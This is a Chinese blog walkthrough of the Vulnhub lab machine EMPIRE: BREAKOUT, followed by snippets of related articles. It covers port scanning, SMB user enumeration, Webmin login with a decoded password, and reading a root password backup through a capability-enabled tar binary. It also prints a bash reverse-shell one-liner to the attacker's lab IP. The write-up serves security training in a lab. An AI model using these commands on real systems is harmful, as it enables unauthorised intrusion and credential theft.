【Vulnhub靶场】EMPIRE: BREAKOUT

最新推荐文章于 2024-01-08 15:58:45 发布
最新推荐文章于 2024-01-08 15:58:45 发布
阅读量3.6k 收藏 1
点赞数 3
分类专栏: Vulnhub 文章标签: 安全 linux 系统安全 网络 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44830645/article/details/122675426
版权

环境准备

下载靶机,导入到vmware里面,这应该不用教了吧
开机可以看到,他已经给出了靶机的IP地址,就不用我们自己去探测了
在这里插入图片描述
攻击机IP地址为:192.168.2.15
靶机IP地址为:192.168.2.18

信息收集

使用nmap扫描靶机开放的端口信息
在这里插入图片描述
发现靶机开放了三个网页端口和SMB服务
我们去网站访问一下
80端口是正常的网页
在这里插入图片描述
但当我去查看源码的时候,发现了ook加密的过后的字符串
在这里插入图片描述

翻译过来时:别担心没有人会来这里,和你分享我的权限是安全的。它是加密的:)
解密过后是:.2uqPEfj3D<P’a-3

这应该是一个密码,先记录下来,接着我们继续查看另外两个网站
10000端口20000端口是不同的登录系统,一个是登录网站的,一个是登录用户的
在这里插入图片描述
在这里插入图片描述

开始渗透

鉴于我们已经有了用户的密码,所以我们要着手寻找用户名了
由于靶机开放了smb服务,所以我们可以收集有关靶机smb的信息
使用命令enum4linux可以收集大量的信息

enum4linux 192.168.2.18

在这里插入图片描述
获得了一个用户名cyber,拿他和之前获得的密码去登录一下20000端口
登录进去一看,发现左下角有一个终端的图标,点进去之后就可以运行命令了
在这里插入图片描述
在这里插入图片描述
我们可以找到第一个flag
在这里插入图片描述
接下来要就要准备提权了

提权

发现目录下还有另外一个文件tar,查看他的权限发现,是可以运行的
在这里插入图片描述
突然给这么一个可运行文件肯定是有深意的,我们看一下这个文件拥有的权限是什么
在这里插入图片描述
发现它是可以读取任意文件的

有关linux setcap命令的信息,可以点这里

那就肯定是要我们找一个文件来读取,获得root的密码
经过一番寻找之后,发现/var/backups下有个备份文件.old_pass.bak
在这里插入图片描述
我们用tar把它打包之后再解压出来,就没有权限问题了

./tar -cvf pass.tar /var/backups/.old_pass.bak
tar -xvf pass.tar

这里打包的时候一定要使用./tar,不然会提示没权限,因为没有加./代表的是你用的系统安装的tar不是这个目录下的tar(我也不知道表达清楚没有
在这里插入图片描述
cat之后获得了root密码
在这里插入图片描述
兴冲冲想登录root结束这道题,但是发现这里有bug
在这里插入图片描述
所以我们反弹一个shell到kali上,kali开始监听10086端口
在这里插入图片描述
然后在靶机输入

bash -i >& /dev/tcp/192.168.2.15/10086 0>&1

即可反弹成功,在此登录root就可以看到最终的flag了

在这里插入图片描述

Starry`Quan
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 6
    评论
专栏目录
[Vulnhub]Empire: Breakout
qq_48749937的博客
03-04 4447
kali ip:192.168.56.105 靶机 ip:192.168.56.110 首先还是常规的扫描靶机开放端口情况 这个靶机跟平常只有ssh和http的靶机不同,没有ssh,猜测可能需要获取webshell 首先访问每一个http服务,80端口: 10000端口: 20000端口: 发现存在两个登录页面,但在审计80端口的首页源码时,发现一串密码,是ook加密: 拿到网站去解密,获得一串密码 成功获取密码,但是目前没有账号,想了好久找不到账号该这么找..
Empire:RDF的JPA实施
04-25
Empire使用为数据库提供了标准的样式接口。 我们对Empire的迫切需求是能够构建RDF支持的Web应用程序,包括 ,同时与JPA / Hibernate风格的RDBMS接口兼容。 Empire的主要设计目标是实现尽可能多的JPA API,以便...
VulnHub靶场----BreakOut
qq_61670993的博客
10-21 1034
小菜鸡一枚
VulnHub靶场】——EMPIRE: BREAKOUT
Demo不是emo的博客
09-24 3393
​ 今天写一份EMPIRE: BREAKOUT靶场教程,靶场环境来源于VulnHub,该网站有很多虚拟机靶场靶场入口在这,推荐大家使用,大家进去直接搜索EMPIRE: BREAKOUT就能下载今天的靶场了,也可以找我拿,话不多说进入正题
Vulnhub靶场Breakout
Nailaoyyds的博客
06-17 687
目录前言一、信息收集0x00 arp-scan扫描0x01 nmap扫描0x02 dirsearch扫描二、漏洞利用0x01 webmin 远程代码漏洞0x02 Brainfuck0x03 enum4linux0x04 反弹shell0x05 搜集信息三、提权0x00 tar利用 总结 arp-scan -I eth1 -l https://192.168.56.101:10000 https://192.168.56.101:20000 二者页面一致 正常页面 未发现webmin源码内
Vulnhub靶机:empire breakout
最新发布
qq_48904485的博客
01-08 849
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:empire:breakout(10.0.2.11)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/empire-breakout,751/
altus-empire:MERN专案
04-01
阿尔图斯帝国
Empire:一个基于Docker和亚马逊ECS的自托管PaaS
02-26
但当我们不断壮大,问题和瓶颈频现,为此我们开始寻求解决之道,首先关注的是开源社区中支持Docker的平台,如Flynn、Deis、CoreOS、Kubernetes等,但都不理想,后通过使用亚马逊ECS,最后确定了Empire,用Empire完成...
Game Theme: Grow Empire: Rome-crx插件
04-06
只有Grow Empire:Rome的最佳高清图像为您的标签背景。 游戏的高清图像在每个选项卡上的成长帝国! 您将获得:1:高清新标签页体验2:简单,清晰的视图! 没有无用的工具,图块或小部件!!! 3:没有烦人的弹出窗口...
Empire: Breakout
Forever_Han13的博客
04-04 540
$ sudo nmap -sP 192.168.0.1/24 Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-02 16:54 CST Nmap scan report for 192.168.0.1 Host is up (0.00054s latency). MAC Address: 24:69:8E:07:FE:4E (Shenzhen Mercury Communication Technologies) Nmap scan report fo
vulnhub EMPIRE: BREAKOUT靶机
小小猪的博客
08-30 681
/tar -cvf pass.tar /var/backups/.old_pass.bak (注:此处使用./tar 表示使用此目录的tar文件)开启了smb服务,enum4linux 192.168.226.129收集更多信息,web指纹页面收集也可以,收集到用户名。直接读取.old_pass.bak文件无法读取,但是我们可以用tar命令将其压缩在解压就可以顺利读取了。经过一番寻找之后,发现/var/backups下有个备份文件.old_pass.bak。再次查看,即可查看到root密码。...
Vulnhub 靶场 EMPIRE: BREAKOUT
weixin_61951055的博客
11-20 651
Vulnhub 靶场 EMPIRE: BREAKOUT
vulnhub-EMPIRE: BREAKOUT
qq_43006864的博客
05-01 764
Empire: Breakout ~ VulnHub 靶机:EMPIRE: BREAKOUT 攻击机: kali linux Linux kali 5.10.0-kali3-amd64 #1 SMP Debian 5.10.13-1kali1 (2021-02-08) x86_64 GNU/Linux 信息收集 nmap 192.168.1.1/24 nmap -sS -sV -A -p- 192.168.1.107 访问一下80端口 在页面源码的最底部发...
靶机1 Empire:Breakout(帝国突围)
honest_gg的博客
09-09 1150
本靶机首先通过文件共享服务可以使用 enum4linux 枚举信息,在通过主页面进行信息收集,得到相关信息,登录后台getshelll,最后通过可执行文件进行提权
EMPIRE_BREAKOUT_ 靶场渗透记录
找寻新世界还为时不晚,因为我的梦想是杨帆到日落之后的地方,尽管现今还无法实现, 但旧日的力量曾撼动天地。
10-09 722
初见BrainFxxk加密,反正名字很霸气
靶机渗透练习42-Empire Breakout
hirak0的博客
04-19 2318
靶机描述 靶机地址:https://www.vulnhub.com/entry/empire-breakout,751/ Description Difficulty: Easy This box was created to be an Easy box, but it can be Medium if you get lost. For hints discord Server ( https://discord.gg/7asvAhCEhe ) 一、搭建靶机环境 攻击机Kali: IP地址:192
02-Breakout vulnhub靶场(tar命令,反弹shell笔记)
weixin_62621015的博客
03-19 287
02-Breakout vulnhub靶场个人通关记录
Vulnhub靶场】EMPIRE: LUPINONE
DG_s1mple
02-13 3722
环境准备 下载镜像后导入到vmware,没啥好说的 发现题目已经给出了ip地址 攻击机IP地址:192.168.2.16 靶机IP地址为:192.168.2.17 信息收集 使用nmap扫描主机信息 发现靶机只开放了ssh跟http,我们先访问他的网站 只有一张图片,查看源代码也没有什么好的发现 开始渗透 我们扫描一下他的网站目录 发现有robots.txt,我们访问一下,发现有~myfiles文件夹 我们访问一下发现404,但是我们查看源代码发现 叫我们继续尝试,就是暗示我们还有别的文件夹,我
vulnhub靶场 breakout
08-29
EMPIRE: BREAKOUT是一个在VulnHub网站上提供的虚拟机靶场。你可以在VulnHub网站上搜索EMPIRE: BREAKOUT,并下载该靶场进行学习和实践。 VulnHub是一个提供各种虚拟机靶场的网站,旨在帮助人们学习和提升网络安全技能。在这个靶场中,你可以接触到加密方式和解密过程,对于第一次接触这种加密方式的人来说,可以使用在线站点来进行解密操作,提高对该加密方式的理解和熟悉度。 EMPIRE: BREAKOUT靶场是一个适合初学者的简单难度的靶场,对于计算机学习者来说,初期的学习往往是最迷茫和难以坚持的,但通过不断的学习和实践,经验和能力会得到提高。这个靶场可以帮助你探索和学习网络安全方面的知识和技能。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [【VulnHub靶场】——EMPIRE: BREAKOUT](https://blog.csdn.net/qq_63844103/article/details/127028486)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值